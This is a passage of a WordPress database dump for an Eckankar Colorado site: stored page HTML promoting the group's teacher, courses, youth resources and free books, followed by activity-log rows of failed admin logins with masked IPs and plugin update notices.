url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(233040,39536,'failed_username','admin'),(233039,39535,'_server_remote_addr','20.38.46.x'),(233038,39535,'_message_key','user_unknown_login_failed'),(233031,39533,'_server_remote_addr','20.38.46.x'),(233029,39533,'server_http_user_agent','Mozilla/5.0'),(233030,39533,'_message_key','user_unknown_login_failed'),(233028,39533,'failed_username','admin'),(233027,39532,'_server_http_referer','https://mra.org.tw/administrator/'),(233026,39532,'_server_remote_addr','81.215.158.x'),(233025,39532,'_message_key','user_unknown_login_failed'),(233024,39532,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(233023,39532,'failed_username','admin'),(233022,39531,'_server_remote_addr','20.38.46.x'),(233021,39531,'_message_key','user_unknown_login_failed'),(233018,39530,'_server_remote_addr','20.38.46.x'),(233019,39531,'failed_username','admin'),(233020,39531,'server_http_user_agent','Mozilla/5.0'),(233017,39530,'_message_key','user_unknown_login_failed'),(233016,39530,'server_http_user_agent','Mozilla/5.0'),(233015,39530,'failed_username','admin'),(233014,39529,'_server_remote_addr','20.38.46.x'),(233012,39529,'server_http_user_agent','Mozilla/5.0'),(233013,39529,'_message_key','user_unknown_login_failed'),(233011,39529,'failed_username','admin'),(233010,39528,'_server_remote_addr','20.38.46.x'),(233009,39528,'_message_key','user_unknown_login_failed'),(233008,39528,'server_http_user_agent','Mozilla/5.0'),(233005,39527,'_wp_cron_running','true'),(233006,39527,'_server_remote_addr','173.231.231.x'),(233007,39528,'failed_username','admin'),(233004,39527,'_message_key','purged_events'),(233003,39527,'num_rows','251'),(233002,39527,'days','60'),(233034,39534,'_message_key','user_unknown_login_failed'),(233035,39534,'_server_remote_addr','198.98.57.x'),(233036,39535,'failed_username','admin'),(233037,39535,'server_http_user_agent','Mozilla/5.0'),(233032,39534,'failed_username','admin'),(233033,39534,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4'),(233041,39536,'server_http_user_agent','Mozilla/5.0'),(233042,39536,'_message_key','user_unknown_login_failed'),(233043,39536,'_server_remote_addr','20.38.46.x'),(233044,39537,'failed_username','admin'),(233045,39537,'server_http_user_agent','Mozilla/5.0'),(233046,39537,'_message_key','user_unknown_login_failed'),(233047,39537,'_server_remote_addr','20.38.46.x'),(233048,39538,'failed_username','admin'),(233049,39538,'server_http_user_agent','Mozilla/5.0'),(233050,39538,'_message_key','user_unknown_login_failed'),(233051,39538,'_server_remote_addr','20.38.46.x'),(233052,39539,'failed_username','admin'),(233053,39539,'server_http_user_agent','Mozilla/5.0'),(233054,39539,'_message_key','user_unknown_login_failed'),(233055,39539,'_server_remote_addr','20.38.46.x'),(233056,39540,'failed_username','admin'),(233057,39540,'server_http_user_agent','Mozilla/5.0'),(233058,39540,'_message_key','user_unknown_login_failed'),(233059,39540,'_server_remote_addr','20.38.46.x'),(233060,39541,'failed_username','admin'),(233061,39541,'server_http_user_agent','Mozilla/5.0'),(233062,39541,'_message_key','user_unknown_login_failed'),(233063,39541,'_server_remote_addr','20.38.46.x'),(233064,39542,'failed_username','admin'),(233065,39542,'server_http_user_agent','Mozilla/5.0'),(233066,39542,'_message_key','user_unknown_login_failed'),(233067,39542,'_server_remote_addr','20.38.46.x'),(233068,39543,'failed_username','admin'),(233069,39543,'server_http_user_agent','Mozilla/5.0'),(233070,39543,'_message_key','user_unknown_login_failed'),(233071,39543,'_server_remote_addr','20.38.46.x'),(233072,39544,'failed_username','administrator'),(233073,39544,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(233074,39544,'_message_key','user_unknown_login_failed'),(233075,39544,'_server_remote_addr','209.141.34.x'),(233076,39545,'failed_username','administrator'),(233077,39545,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0'),(233078,39545,'_message_key','user_unknown_login_failed'),(233079,39545,'_server_remote_addr','45.61.188.x'),(233080,39546,'failed_username','administrator'),(233081,39546,'server_http_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'),(233082,39546,'_message_key','user_unknown_login_failed'),(233083,39546,'_server_remote_addr','198.98.51.x'),(233084,39547,'failed_username','admin'),(233085,39547,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(233086,39547,'_message_key','user_unknown_login_failed'),(233087,39547,'_server_remote_addr','205.185.115.x'),(233088,39548,'failed_username','administrator'),(233089,39548,'server_http_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53'),(233090,39548,'_message_key','user_unknown_login_failed'),(233091,39548,'_server_remote_addr','104.244.79.x'),(233092,39549,'failed_username','admin'),(233093,39549,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(233094,39549,'_message_key','user_unknown_login_failed'),(233095,39549,'_server_remote_addr','205.185.123.x'),(233096,39550,'failed_username','admin'),(233097,39550,'server_http_user_agent','Mozilla/5.0'),(233098,39550,'_message_key','user_unknown_login_failed'),(233099,39550,'_server_remote_addr','104.225.143.x'),(233100,39551,'failed_username','admin'),(233101,39551,'server_http_user_agent','Mozilla/5.0'),(233102,39551,'_message_key','user_unknown_login_failed'),(233103,39551,'_server_remote_addr','104.225.143.x'),(233104,39552,'failed_username','admin'),(233105,39552,'server_http_user_agent','Mozilla/5.0'),(233106,39552,'_message_key','user_unknown_login_failed'),(233107,39552,'_server_remote_addr','104.225.143.x'),(233108,39553,'failed_username','admin'),(233109,39553,'server_http_user_agent','Mozilla/5.0'),(233110,39553,'_message_key','user_unknown_login_failed'),(233111,39553,'_server_remote_addr','104.225.143.x'),(233112,39554,'failed_username','admin'),(233113,39554,'server_http_user_agent','Mozilla/5.0'),(233114,39554,'_message_key','user_unknown_login_failed'),(233115,39554,'_server_remote_addr','104.225.143.x'),(233116,39555,'failed_username','admin'),(233117,39555,'server_http_user_agent','Mozilla/5.0'),(233118,39555,'_message_key','user_unknown_login_failed'),(233119,39555,'_server_remote_addr','104.225.143.x'),(233120,39556,'plugin_name','Modula'),(233121,39556,'plugin_current_version','2.7.7'),(233122,39556,'plugin_new_version','2.7.8'),(233123,39556,'_message_key','plugin_update_available'),(233124,39556,'_server_remote_addr','173.231.231.x'),(233125,39557,'failed_username','serena'),(233126,39557,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(233127,39557,'_message_key','user_unknown_login_failed'),(233128,39557,'_xmlrpc_request','true'),(233129,39557,'_server_remote_addr','104.28.200.x'),(233130,39558,'failed_username','admin'),(233131,39558,'server_http_user_agent','Mozilla/5.0'),(233132,39558,'_message_key','user_unknown_login_failed'),(233133,39558,'_server_remote_addr','104.225.143.x'),(233134,39559,'failed_username','admin'),(233135,39559,'server_http_user_agent','Mozilla/5.0'),(233136,39559,'_message_key','user_unknown_login_failed'),(233137,39559,'_server_remote_addr','104.225.143.x'),(233138,39560,'failed_username','admin'),(233139,39560,'server_http_user_agent','Mozilla/5.0'),(233140,39560,'_message_key','user_unknown_login_failed'),(233141,39560,'_server_remote_addr','104.225.143.x'),(233142,39561,'plugin_name','WPCode Lite'),(233143,39561,'plugin_current_version','2.1.3.1'),(233144,39561,'plugin_new_version','2.1.4'),(233145,39561,'_message_key','plugin_update_available'),(233146,39561,'_server_remote_addr','173.231.231.x'),(233147,39562,'failed_username','admin'),(233148,39562,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(233149,39562,'_message_key','user_unknown_login_failed'),(233150,39562,'_xmlrpc_request','true'),(233151,39562,'_server_remote_addr','20.163.77.x'),(233152,39563,'failed_username','admin'),(233153,39563,'server_http_user_agent','Mozilla/5.0'),(233154,39563,'_message_key','user_unknown_login_failed'),(233155,39563,'_server_remote_addr','104.225.143.x'),(233156,39564,'failed_username','admin'),(233157,39564,'server_http_user_agent','Mozilla/5.0'),(233158,39564,'_message_key','user_unknown_login_failed'),(233159,39564,'_server_remote_addr','104.225.143.x'),(233160,39565,'failed_username','admin'),(233161,39565,'server_http_user_agent','Mozilla/5.0'),(233162,39565,'_message_key','user_unknown_login_failed'),(233163,39565,'_server_remote_addr','104.225.143.x'),(233164,39566,'failed_username','admin'),(233165,39566,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(233166,39566,'_message_key','user_unknown_login_failed'),(233167,39566,'_server_remote_addr','104.244.74.x'),(233168,39567,'failed_username','admin'),(233169,39567,'server_http_user_agent','Mozilla/5.0'),(233170,39567,'_message_key','user_unknown_login_failed'),(233171,39567,'_server_remote_addr','104.225.143.x'),(233172,39568,'failed_username','admin'),(233173,39568,'server_http_user_agent','Mozilla/5.0'),(233174,39568,'_message_key','user_unknown_login_failed'),(233175,39568,'_server_remote_addr','104.225.143.x'),(233176,39569,'failed_username','admin'),(233177,39569,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(233178,39569,'_message_key','user_unknown_login_failed'),(233179,39569,'_server_remote_addr','205.185.123.x'),(233180,39570,'failed_username','admin'),(233181,39570,'server_http_user_agent','Mozilla/5.0'),(233182,39570,'_message_key','user_unknown_login_failed'),(233183,39570,'_server_remote_addr','104.225.143.x'),(233184,39571,'failed_username','admin'),(233185,39571,'server_http_user_agent','Mozilla/5.0'),(233186,39571,'_message_key','user_unknown_login_failed'),(233187,39571,'_server_remote_addr','104.225.143.x'),(233188,39572,'plugin_name','Wordfence Security'),(233189,39572,'plugin_current_version','7.10.4'),(233190,39572,'plugin_new_version','7.10.5'),(233191,39572,'_message_key','plugin_update_available'),(233192,39572,'_server_remote_addr','173.231.231.x'),(233193,39573,'failed_username','admin'),(233194,39573,'server_http_user_agent','Mozilla/5.0'),(233195,39573,'_message_key','user_unknown_login_failed'),(233196,39573,'_server_remote_addr','104.225.143.x'),(233197,39574,'failed_username','admin'),(233198,39574,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(233199,39574,'_message_key','user_unknown_login_failed'),(233200,39574,'_server_remote_addr','104.244.74.x'),(233201,39575,'failed_username','admin'),(233202,39575,'server_http_user_agent','Mozilla/5.0'),(233203,39575,'_message_key','user_unknown_login_failed'),(233204,39575,'_server_remote_addr','104.225.143.x'),(233205,39576,'failed_username','admin'),(233206,39576,'server_http_user_agent','Mozilla/5.0'),(233207,39576,'_message_key','user_unknown_login_failed'),(233208,39576,'_server_remote_addr','104.225.143.x'),(233209,39577,'failed_username','admin'),(233210,39577,'server_http_user_agent','Mozilla/5.0'),(233211,39577,'_message_key','user_unknown_login_failed'),(233212,39577,'_server_remote_addr','20.38.42.x'),(233213,39578,'failed_username','admin'),(233214,39578,'server_http_user_agent','Mozilla/5.0'),(233215,39578,'_message_key','user_unknown_login_failed'),(233216,39578,'_server_remote_addr','20.38.42.x'),(233217,39579,'failed_username','admin'),(233218,39579,'server_http_user_agent','Mozilla/5.0'),(233219,39579,'_message_key','user_unknown_login_failed'),(233220,39579,'_server_remote_addr','20.38.42.x'),(233221,39580,'failed_username','admin'),(233222,39580,'server_http_user_agent','Mozilla/5.0'),(233223,39580,'_message_key','user_unknown_login_failed'),(233224,39580,'_server_remote_addr','20.38.42.x'),(233225,39581,'post_id','269244'),(233226,39581,'post_type','nf_sub'),(233227,39581,'post_title',''),(233228,39581,'_message_key','post_updated'),(233229,39581,'_server_remote_addr','107.2.173.x'),(233230,39581,'_server_http_referer','https://eckankar-colorado.org/contact-us/'),(233231,39582,'failed_username','admin'),(233232,39582,'server_http_user_agent','Mozilla/5.0'),(233233,39582,'_message_key','user_unknown_login_failed'),(233234,39582,'_server_remote_addr','104.225.143.x'),(233235,39583,'failed_username','individualise'),(233236,39583,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233237,39583,'_message_key','user_unknown_login_failed'),(233238,39583,'_xmlrpc_request','true'),(233239,39583,'_server_remote_addr','57.128.65.x'),(233240,39584,'failed_username','individualise'),(233241,39584,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233242,39584,'_message_key','user_unknown_login_failed'),(233243,39584,'_server_remote_addr','57.128.65.x'),(233244,39584,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233245,39585,'failed_username','individualise'),(233246,39585,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(233247,39585,'_message_key','user_unknown_login_failed'),(233248,39585,'_server_remote_addr','57.128.65.x'),(233249,39585,'_server_http_referer','https://eckankar-colorado.org//wp-login.php'),(233250,39586,'failed_username','individualise'),(233251,39586,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 